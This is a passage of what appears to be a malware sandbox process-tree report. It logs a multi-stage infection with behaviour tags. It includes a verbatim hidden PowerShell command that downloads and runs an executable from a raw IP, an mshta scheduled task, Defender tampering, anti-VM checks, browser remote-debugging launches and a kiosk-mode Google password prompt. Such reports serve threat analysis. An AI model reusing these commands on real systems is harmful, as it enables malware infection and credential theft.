                        8⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3044
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                      7⤵
                      • System Location Discovery: System Language Discovery
                      PID:2004
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                        8⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5664
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /tn "e2DIfmaq1mU" /tr "mshta \"C:\Temp\RqgykxeXb.hta\"" /sc minute /mo 25 /ru "Admin" /f
                      7⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:1588
                    • C:\Windows\SysWOW64\mshta.exe
                      mshta "C:\Temp\RqgykxeXb.hta"
                      7⤵
                      • Checks computer location settings
                      • System Location Discovery: System Language Discovery
                      PID:4228
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                        8⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Downloads MZ/PE file
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:6072
                        • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                          "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                          9⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4156
                  • C:\Users\Admin\AppData\Local\Temp\10301300101\459613c64c.exe
                    "C:\Users\Admin\AppData\Local\Temp\10301300101\459613c64c.exe"
                    6⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:3104
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      7⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:5352
                  • C:\Users\Admin\AppData\Local\Temp\10301310101\e288b23208.exe
                    "C:\Users\Admin\AppData\Local\Temp\10301310101\e288b23208.exe"
                    6⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:5068
                  • C:\Users\Admin\AppData\Local\Temp\10301320101\b409608e79.exe
                    "C:\Users\Admin\AppData\Local\Temp\10301320101\b409608e79.exe"
                    6⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Downloads MZ/PE file
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Loads dropped DLL
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Checks processor information in registry
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1380
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                      7⤵
                      • Uses browser remote debugging
                      • Checks processor information in registry
                      • Enumerates system info in registry
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of FindShellTrayWindow
                      PID:1804
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff96a4edcf8,0x7ff96a4edd04,0x7ff96a4edd10
                        8⤵
                          PID:1824
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2000,i,12350934811989664482,7824373559038055934,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1996 /prefetch:2
                          8⤵
                            PID:404
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1600,i,12350934811989664482,7824373559038055934,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2300 /prefetch:3
                            8⤵
                              PID:2560
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2404,i,12350934811989664482,7824373559038055934,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1944 /prefetch:8
                              8⤵
                                PID:1088
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3160,i,12350934811989664482,7824373559038055934,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3220 /prefetch:1
                                8⤵
                                • Uses browser remote debugging
                                PID:2844
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,12350934811989664482,7824373559038055934,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3172 /prefetch:1
                                8⤵
                                • Uses browser remote debugging
                                PID:368
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4220,i,12350934811989664482,7824373559038055934,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4248 /prefetch:2
                                8⤵
                                • Uses browser remote debugging
                                PID:5852
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4644,i,12350934811989664482,7824373559038055934,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4688 /prefetch:1
                                8⤵
                                • Uses browser remote debugging
                                PID:5792
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5232,i,12350934811989664482,7824373559038055934,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5236 /prefetch:8
                                8⤵
                                  PID:4156
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5448,i,12350934811989664482,7824373559038055934,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5456 /prefetch:8
                                  8⤵
                                    PID:2480
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
                                  7⤵
                                  • Uses browser remote debugging
                                  • Checks processor information in registry
                                  • Enumerates system info in registry
                                  • Modifies registry class
                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                  • Suspicious use of FindShellTrayWindow
                                  PID:3824
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x264,0x7ff96602f208,0x7ff96602f214,0x7ff96602f220
                                    8⤵
                                      PID:4976
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1928,i,8193150190239167289,4635863346637414802,262144 --variations-seed-version --mojo-platform-channel-handle=2192 /prefetch:3
                                      8⤵
                                        PID:3964
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2160,i,8193150190239167289,4635863346637414802,262144 --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:2
                                        8⤵
                                          PID:4588
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2504,i,8193150190239167289,4635863346637414802,262144 --variations-seed-version --mojo-platform-channel-handle=2668 /prefetch:8
                                          8⤵
                                            PID:4816
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3564,i,8193150190239167289,4635863346637414802,262144 --variations-seed-version --mojo-platform-channel-handle=3584 /prefetch:1
                                            8⤵
                                            • Uses browser remote debugging
                                            PID:2596
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3572,i,8193150190239167289,4635863346637414802,262144 --variations-seed-version --mojo-platform-channel-handle=3720 /prefetch:1
                                            8⤵
                                            • Uses browser remote debugging
                                            PID:3056
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5628,i,8193150190239167289,4635863346637414802,262144 --variations-seed-version --mojo-platform-channel-handle=5672 /prefetch:8
                                            8⤵
                                              PID:2764
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5612,i,8193150190239167289,4635863346637414802,262144 --variations-seed-version --mojo-platform-channel-handle=5696 /prefetch:8
                                              8⤵
                                                PID:3588
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5788,i,8193150190239167289,4635863346637414802,262144 --variations-seed-version --mojo-platform-channel-handle=6340 /prefetch:8
                                                8⤵
                                                  PID:3184
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6596,i,8193150190239167289,4635863346637414802,262144 --variations-seed-version --mojo-platform-channel-handle=6624 /prefetch:8
                                                  8⤵
                                                    PID:2284
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6596,i,8193150190239167289,4635863346637414802,262144 --variations-seed-version --mojo-platform-channel-handle=6624 /prefetch:8
                                                    8⤵
                                                      PID:6492
                                                • C:\Users\Admin\AppData\Local\Temp\10301330101\129abd96c0.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\10301330101\129abd96c0.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of FindShellTrayWindow
                                                  • Suspicious use of SendNotifyMessage
                                                  PID:5968
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /F /IM firefox.exe /T
                                                    7⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3756
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /F /IM chrome.exe /T
                                                    7⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3684
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /F /IM msedge.exe /T
                                                    7⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2908
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /F /IM opera.exe /T
                                                    7⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1664
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /F /IM brave.exe /T
                                                    7⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4880
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                    7⤵
                                                      PID:5736
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                        8⤵
                                                        • Drops desktop.ini file(s)
                                                        • Checks processor information in registry
                                                        • Modifies registry class
                                                        • Suspicious use of FindShellTrayWindow
                                                        • Suspicious use of SendNotifyMessage
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:4748
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1996 -prefsLen 27099 -prefMapHandle 2000 -prefMapSize 270279 -ipcHandle 2076 -initialChannelId {94c42395-4103-47cd-add8-98be6e0a5467} -parentPid 4748 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4748" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                          9⤵
                                                            PID:5092
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2484 -prefsLen 27135 -prefMapHandle 2488 -prefMapSize 270279 -ipcHandle 2496 -initialChannelId {7d446836-f37d-4773-9cdc-d30b6ab4b2a5} -parentPid 4748 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4748" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                            9⤵
                                                              PID:1704
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3856 -prefsLen 25164 -prefMapHandle 3860 -prefMapSize 270279 -jsInitHandle 3864 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3872 -initialChannelId {e85dd17e-c0ad-4aff-866c-2b084ee62b0e} -parentPid 4748 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4748" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                              9⤵
                                                              • Checks processor information in registry
                                                              PID:2896
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4024 -prefsLen 27276 -prefMapHandle 4028 -prefMapSize 270279 -ipcHandle 4124 -initialChannelId {bb8a0e7f-2bc9-4a3e-8da0-8746943902e0} -parentPid 4748 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4748" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                              9⤵
                                                                PID:2140
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2736 -prefsLen 34775 -prefMapHandle 3064 -prefMapSize 270279 -jsInitHandle 3068 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4504 -initialChannelId {69ef70ef-6016-4559-8eb7-29bbc4c2d122} -parentPid 4748 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4748" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                9⤵
                                                                • Checks processor information in registry
                                                                PID:264
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 3084 -prefsLen 35012 -prefMapHandle 5004 -prefMapSize 270279 -ipcHandle 3092 -initialChannelId {24163ebf-438e-47d8-9566-7365c9414373} -parentPid 4748 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4748" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                9⤵
                                                                • Checks processor information in registry
                                                                PID:6500
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5272 -prefsLen 32952 -prefMapHandle 5276 -prefMapSize 270279 -jsInitHandle 5280 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5288 -initialChannelId {9ca2b1b3-9d05-425f-9026-834c6a02402c} -parentPid 4748 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4748" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                9⤵
                                                                • Checks processor information in registry
                                                                PID:6604
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5332 -prefsLen 32952 -prefMapHandle 5320 -prefMapSize 270279 -jsInitHandle 5420 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5492 -initialChannelId {3e0a71ee-7e97-45a1-b27e-fadfe0838617} -parentPid 4748 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4748" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                9⤵
                                                                • Checks processor information in registry
                                                                PID:6620
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5680 -prefsLen 32952 -prefMapHandle 5684 -prefMapSize 270279 -jsInitHandle 5688 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5528 -initialChannelId {e47d3699-a02d-4b6a-9d9d-3700aa11da75} -parentPid 4748 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4748" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                9⤵
                                                                • Checks processor information in registry
                                                                PID:6636
                                                        • C:\Users\Admin\AppData\Local\Temp\10301340101\57130731de.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10301340101\57130731de.exe"
                                                          6⤵
                                                          • Modifies Windows Defender DisableAntiSpyware settings
                                                          • Modifies Windows Defender Real-time Protection settings
                                                          • Modifies Windows Defender TamperProtection settings
                                                          • Modifies Windows Defender notification settings
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Executes dropped EXE
                                                          • Identifies Wine through registry keys
                                                          • Windows security modification
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:4576
                                                        • C:\Users\Admin\AppData\Local\Temp\10301350101\54bd17100d.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10301350101\54bd17100d.exe"
                                                          6⤵
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Checks computer location settings
                                                          • Executes dropped EXE
                                                          • Identifies Wine through registry keys
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          • System Location Discovery: System Language Discovery
                                                          • Checks processor information in registry
                                                          PID:1560
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                            7⤵
                                                            • Uses browser remote debugging
                                                            • Checks processor information in registry
                                                            • Enumerates system info in registry
                                                            • Modifies data under HKEY_USERS
                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:5100
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff969e8dcf8,0x7ff969e8dd04,0x7ff969e8dd10
                                                              8⤵
                                                                PID:2724
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1928,i,4617786195355776464,17596171987503960163,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2160 /prefetch:3
                                                                8⤵
                                                                  PID:5792
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2016,i,4617786195355776464,17596171987503960163,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2024 /prefetch:2
                                                                  8⤵
                                                                    PID:5736
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2368,i,4617786195355776464,17596171987503960163,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2436 /prefetch:8
                                                                    8⤵
                                                                      PID:216
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3220,i,4617786195355776464,17596171987503960163,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3260 /prefetch:1
                                                                      8⤵
                                                                      • Uses browser remote debugging
                                                                      PID:4572
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3228,i,4617786195355776464,17596171987503960163,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3296 /prefetch:1
                                                                      8⤵
                                                                      • Uses browser remote debugging
                                                                      PID:2372
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4236,i,4617786195355776464,17596171987503960163,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3792 /prefetch:2
                                                                      8⤵
                                                                      • Uses browser remote debugging
                                                                      PID:2160
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
